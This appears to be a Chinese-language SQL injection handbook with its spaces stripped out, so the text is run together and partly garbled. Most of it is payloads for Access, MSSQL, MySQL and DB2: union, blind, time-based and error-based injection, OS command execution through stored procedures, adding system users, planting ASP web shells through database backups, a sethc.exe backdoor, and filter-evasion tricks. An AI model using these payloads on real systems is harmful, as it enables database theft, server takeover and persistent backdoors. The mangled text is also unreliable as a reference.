内容教程说明sql injection handbook

ANDAND与AND1=2执行SQL当执行/url.asp?id=1andexists(selectidfrom[admin])selectselect*fromtablewhereid=1andexists(selectidfromSQL的查询执行结果。当执行/url.asp?id=1and1=2unionallselect1,2,fromadminSelectSelect*fromtablewhereid=1and1=2unionallselect1,2,……from /url.asp?id=1and /url.asp?id=1and/url.asp?id=1anduser MSSQL/url.asp?id=1'and /url.asp?id=1'and/url.asp?id=1anduserchar(124)=0and MSSQL/url.asp?search=t%25'and25'='&/url.asp?search=t%25'and 判断搜索过滤不严%25当作/url.asp?search=t%25'and1=1and &/url.asp?search=t%25'and1=2and/url.asp?search=t%25'anduserchar(124)=0and MSSQLSELECTSELECT*FROMnewswhere(((info)Like"t%"))and注意：当你尝试在OfficeAccess中测试这条命令时，该语句将无法查询出正确结果，因为ANSISQL中的通配符(%)和(_)只能在 Access数据库引擎和AccessOLEDBProvider中使用。如果通过Access或DAO使用，它们将被视为文字。And(selectcount(*)fromMSSQLAnd(selectcount(*)fromAccess猜表名、列名(字段名Andexists(select*fromadminadminAndexists(selectusernamefromadmin判断admin表下是否存在名为usernameUNIONAnd1=2UnionallSelect1,2,fromSQL语句中的“ 某些表/SQL中的保留关键字或系统变量对象，都必须使用And(selectCount(1)from countAnd(selectCount(1)from[admin]where1=1)between0And(selecttop1len(password)fromtopAnd(selecttop1len(password)fromadmin)between0猜字段的ASCII值AndAnd(selecttop1asc(mid(字段名,1,1))from表名;And(selecttop1unicode(substring(字段名,1,1))from表名between30and130//And(selecttop1ord(password,1,1)from MssqlphpordMid函数用于定位字符串里的字符，AscAscii编码。97a、49例：asc(mid(username,2,1))表示使用midusername2asciiAndAnd(selecttop1left(username,1)fromAnd(selecttop1left(username,2)from left AccessAccess举例说明：(7个字段，admin3个字段unionunionselect1,2,3,4,5,6,7,8,9,10fromadminunionselect1,2,3,4,5,6,7,*fromadminunionunionselect1,2,3,4,*from(adminasainnerjoinadminasbonunionselect1,2,3,4,a.id,*from(adminasainnerjoinadminasbona.id=b.id)unionselect1,2,3,4,a.id,b.id,*fromunionselect1,2,3,4,a.id,*from(adminasainnerjoinadminasbona.id=b.id)unionselect1,2,3,4,a.id,b.id,*from(adminasainnerjoinadminasbona.id=b.id)unionunionselect1,2,3,a.id,b.id,c.id,*from((adminasainnerjoinadminasbona.id=b.id)innerjoinadminasconunionselect1,a.id,b.id,c.id,d.id,*from(((adminasainnerjoinadminasbona.id=b.id)innerjoinadminascona.id=c.id)innerjoinadminasdona.id=d.id)利用注射点判断数据库WEB利用注射点判断数据库WEB得到客户端主机名与服务端主机名selecthost_name();select 测试MSSQL;--SQLand1=(selectIS_SRVROLEMEMBER('serveradmin'));-and1=(selectIS_SRVROLEMEMBER('setupadmin'));-and1=(selectIS_SRVROLEMEMBER('securityadmin'));-and1=(selectIS_SRVROLEMEMBER('diskadmin'));-and1=(selectIS_SRVROLEMEMBER('bulkadmin'));-and1=(selectIS_MEMBER('db_owner'));-HAVING暴表名、字段名t'having1=1-t'groupbyidhaving1=1-t'groupbyid,useridhavingOLEDBProviderforSQLServer80040e14’users.IDGROUPBY基于时间的SQL注入(延时注入) 5'-- -- Mssql注意：查询使用的值(55秒)1秒(WAITFORDELAY'0:0:1')24小时(WAITFORDELAY取得合理平衡。较小的值能为我们提供较快的响应，但可能会因为受未预料的网络延迟或服务器最大负 .htmMSSQL2000+注释符SQL 、 、andand userSQLserverint出错 如果是sa权限。提示的是将“dbo”转换成int出错and(select SQL;declare@aint and(selectcount(1)from and xtyp（i（and(selecttop1namefrom(selecttop1id,namefromsysobjectswherextype=char(85))Torderbyid and(selecttop1namefrom(selecttop2id,namefromsysobjectswherextype=char(85))Torderbyid and(selecttop1namefromsysobjectswhereand(selecttop1namefromsysobjectswherextype='U'andnamenotin第一个表名)COL_NAME(able_id,column_id)table_id是表的标识号，column_id是列的标识号。object_id(admin)adminsysobjects中的标识号，column_id=1,2,3admin1，2，3列，and(selecttop1col_name(object_id('表段'),1)fromand(selecttop1col_name(object_id('表段'),2)fromand(selecttop1from表段and(selecttop1fromwhere;update;updateset列名='内容where;updateadminsetpassword='123'where;insertintovalues(内容;insertintoadminvalues(admin,123)-;dropdatabase SAandSAand1=(SELECTcount(*)FROMmaster.dbo.sysobjectsWHERExtype='X'ANDname= 判断 是否被删除，返回正常说明存在 ', 恢复 ;exec 'netuserMyName123456 cmd;exec 'dir;exec SAcreatetabledirs(pathsvarchar(100),idint)insertdirsexecmaster.dbo.xp_dirtree'c:\'and(selecttop1pathsfromdirs)>0and(selecttop1pathsfromdirswherepathsnotin('createtabletemp(idnvarchar(255),num1nvarchar(255),num2nvarchar(255),num3nvarchar(255));- 的insertintotemp(id)exec Sa点执行 可以结合IIS的adsutil.vbs快速查表根键,xp_regread表根键,xp_regread根键,子键,xp_regwrite根键,子键,值名,值类型xp_regdeletevalue根键,子键,值名execxp_regdeletekey根键,子键2REG_SZ表示字符型,REG_DWORD exec exec 写 // usecreatetableusecreatetablecmd(strinsertintocmd(str)values('<%evalrequest(chr(35))%>');backupdatabasemodeltodisk='c:\l.asp';and(select and(select Windowsanduser_name()='dbo' and(selectuser_name())>0// and(select Public注意：SQLServerAgent服务必须开启,Selecthost_name()获取当前库服务器机器名USEUSEEXECsp_add_job@job_name='GetSystemOnSQL',@enabled=1,@delete_level=EXECsp_add_jobstep@job_name='GetSystemOnSQL',@step_name='Execmysql',@subsystem= "netuseriislogerhook/add>c:\fish.txt"'''''',N''Master'''EXECsp_add_jobserver@job_name='GetSystemOnSQL',@server_nameSQL服务器名EXECsp_start_job@job_name= MSSQL2005手工盲注Andsubstring((selectAndsubstring((selectAndAnd(selectcount(*)frommaster.dbo.sysdatabaseswhere And(selectcount(*)frommaster.dbo.sysdatabaseswheredbid=5and dbidAnd(selectcount(*)frommaster.dbo.sysdatabaseswheredbid=5and And(selectcount(*)And(selectcount(*)fromdatabase.dbo.sysobjectswherextype='u'andnamelike And(selectcount(*)fromdatabase.dbo.sysobjectswherenamein(selecttop1namefromdatabase.dbo.sysobjectswherextype='u')andlen(name)=9)=1 And(selectcount(*)fromdatabase.dbo.sysobjectswherenamein(selecttop1namefromdatabase.dbo.sysobjectswherextype='u')andascii(substring(name,1,1))>90)=1 And(selectcount(*)fromdatabase.dbo.sysobjectswherenamein(selecttop1namefromdatabase.dbo.sysobjectswherextype='u'andnamenotin('table1'))andascii(substring(name,1,1))>90)=1 猜第二个表名（And(selectcount(*)fromdatabase.dbo.syscolumnswherenamein(selecttop1namefromdatabase_db.dbo.syscolumnswhereid=object_id('database.dbo.table'))And(selectcount(*)fromdatabase.dbo.syscolumnswherenamein(selecttop1namefromdatabase_db.dbo.syscolumnswhereid=object_id('database.dbo.table'))andascii(substring(name,1,1))>90)=1 And(selectcount(*)fromdatabase.dbo.syscolumnswherenamein(selecttop1namefromdatabase_db.dbo.syscolumnswhereid=object_id('database.dbo.table')andnamenotin('column1'))and 猜第二个（And(selectcount(*)fromdatabase.dbo.tablewherenamein(selecttop1namefromdatabase_db.dbo.table)andAnd(selectcount(*)fromdatabase.dbo.tablewherenamein(selecttop1namefromdatabase_db.dbo.table)and MMSSQLexec 'netexec 'net execexecexecmaster..xp_regwriteExecution\WindowsNT\CurrentVersion\Imageexecmaster..xp_regwriteExecution\WindowsNT\CurrentVersion\Image 执行命令(netdeclare@aint;execmaster..sp_oacreate'WScript.S ',@aoutput;execmaster..sp_oamethod@a,'run',null,'cmd/cnetuser>C:\WINDOWS\Temp\~098611.tmp',0,'true'Ifobject_id('dark_temp')isnotnulldroptabledark_temp;createtabledark_temp(aanvarchar(4000));bulkinsertdark_tempfrom'C:\WINDOWS\Temp\~098611.tmp'execexecSelect*From ("cmd/cnetuser>Ifobject_id('dark_temp')isnotnulldroptabledark_temp;createtabledark_temp(aanvarchar(4000));bulkdark_tempFSOmaster..xp_unpackcab'C:\windows\temp\~098611.tmp','C:\WINDOWS\system32',1,'Sethc.exe'Cab拷贝文件(cmd.exetomaster..xp_unpackcab'C:\windows\temp\~098611.tmp','C:\WINDOWS\system32',1,'Sethc.exe'能开启 EXECmaster..sp_configure'showadvancedoptions',1;RECONFIGURE;EXECmaster..sp_configure'AdHocDistributed11．LogbackupalterdatabaseSetrecoveryfull;dumptransactionwithno_log;Ifobject_id('dark_temp')isnotnulldroptabledark_temp;createtabledark_temp(aasql_variantprimarykey)backupdatabasetodisk='C:\windows\temp\~098611.tmp'withinsertdark_tempvalues('<%evalbackuplog数据库名to ：DarkBlade1.3 MMSSQL11createtable[dbo].[jm_tmp([cmdimage]) 2、declare@asysname,@snvarchar(4000)select@a=db_name(),@s=0X6A006D00640063007700database@atodisk@s 备份数据库，@s为备份名称(jmdcw16进制转换2insertinto[jm_tmp](cmd//将一句话木马“<%execute(request("l"))%>163declare@asysname,@snvarchar(4000)select@a=db_name(),@s='C:\Program Shared\WebServerExtensions\40\isapi\jm.asp'backupdatabase@atodisk=@sWITHDIFFERENTIAL,FORMAT–//对数据库实行差异备份，备份的保存路径暂定为C 5、droptable[jm_tmp 数据库！其实还有很多小技巧，如果权限足够的话，可以备份到同一段的其他机器，比如域内的，或者 11droptablejm_tmp];createtablejm_tmp](valuenavrchar(4000)null,datanvarchar(4000)null//1deletejm_tmp];insert[jm_tmp]exec// 插到表字段3、and(selecttop1cast([data]asnvarchar(4000)+char(124)from[jm_tmp]orderby[data] //4、droptablejm_tmp// 11、droptablejm_tmp];createtablejm_tmp](subdirectorynvarchar(400)NULL,depthtinyintNULL,[file]bitNULL//[//C3、and1=(selecttop1cast([subdirectory]asnvarchar(400))+char(124)+cast([file]asFrom(SelectTop1[subdirectory],[file]From[jm_tmp]ORDERBY[file],[subdirectory])TORDERBYdesc,[subdirectory]desc) //4、and1=(selecttop1cast([subdirectory]asnvarchar(400))+char(124)+cast([file]asFrom(SelectTop2[subdirectory],[file]From[jm_tmp]ORDERBY[file],[subdirectory])TORDERBY[file]desc,[subdirectory]desc)‘ 5、and1=(selecttop1cast([subdirectory]asnvarchar(400))+char(124)+cast([file]asnvarchar(1))+char(124)From(SelectTopX[subdirectory],[file]From[jm_tmp]ORDERBY[file],[subdirectory])TORDERBY[file]desc,[subdirectory]desc) X6、droptablejm_tmp Mysql5.xMysql5.xselectSCHEMA_NAMEfrominformation_schema.SCHEMATAlimit5,1/*// 5,1155,1/*TABLE_SCHEMA=16进制selectCOLUMN_NAMEfrominformation_schema.COLUMNSwherelimitMYSQLand1=2unionselect and1=2unionselect HEXlimitOrderby and1=2unionselect HEXlimit利用利用Mysql ark ark根unionselect php的max_execution_time最大执行时间默认配置，mysql错IDSinformation_schemamysql>mysql>SELECT*FROM(SELECT*FROMuserAJOINuserB)C;ERROR1060(42S21):Duplicatecolumnname'Host'mysql>SELECT*FROM(SELECT*FROMuserAJOINuserBUSING(Host))C;ERROR1060(42S21):Duplicatecolumnname'User'mysql>SELECT*FROM(SELECT*FROMuserAJOINuserBUSING(Host,User))C;ERROR1060(42S21):Duplicatecolumnname'Password'64mysql>mysql>SELECT1FROM(selectcount(*),concat(floor(rand(0)*2),(SELECT'x'))afrominformation_schema.tablesgroupbya)b;ERROR1062(23000):Duplicateentry'1x'forkey MySQL64MID慢慢 /2009/10/advanced-sql-injection-lab-full-pack.html mysql>mysql>SELECT1FROMdede_adminWHEREupdatexml(1,(SELECT,MID(pwd,4,16),0x5d)FROMERROR1105(HY000):XPATHsyntaxerror:IBMDB2注射语句 selectselectNAMEfromSYSIBM.SYSCOLUMNSwhereTBCREATOR=''and selectselectNAMEfromSYSIBM.SYSTABLESwhereCREATOR=USERFETCHFIRST1ROWS sqlservertopSUBSTR(string,SUBSTR(string,position, //ascandand(selectASCII(SUBSTR(NAME,1,1))fromSYSIBM.SYSTABLESwhereCREATOR=USERFETCHFIRST1ROWSONLY)>50– tableascii绕过防注入方法URLEncode编码，URLEncode编码，ASCIIor1=1or'swords'mssqlor'swords'or1=1or1=1判断绕过,or'swords'or'swordsor'swordsN'swordsNmssqlservernvarchar类型，它起到类型转IDS。or'swords'or'swords'=‘sw'+'ords'；EXEC(‘IN'+'SERTINTO'+'…..'or'swords'LIKE'sw'or'swords'LIKE'sw'LIKE的思路差不多,LIKE的思路差不多,or'swords'INor'swordsBETWEENor'swordsBETWEENrw'ANDor'swords'>'sw'oror'swords'>'sw'or'swords'<'tw'or1<3UNION/**/Select/**/user，pwd，from ，如U/**/NION/**/SE/**/LECT/**/user，pwdfromEE00EE00 值给a，然后调用变量a最终执行我们输 令。变量a可以是任何命令。如下declare@asysnameselect@a=exec %20@a;-“netuserangelpassphpsafe_modephpsafe_modeOn的时候会过滤'为\'如果前面加个%d5的话，就和%5c构成一个汉字：诚使用%And使用%Andexi%%sts(s%%elect*%fr%%omASC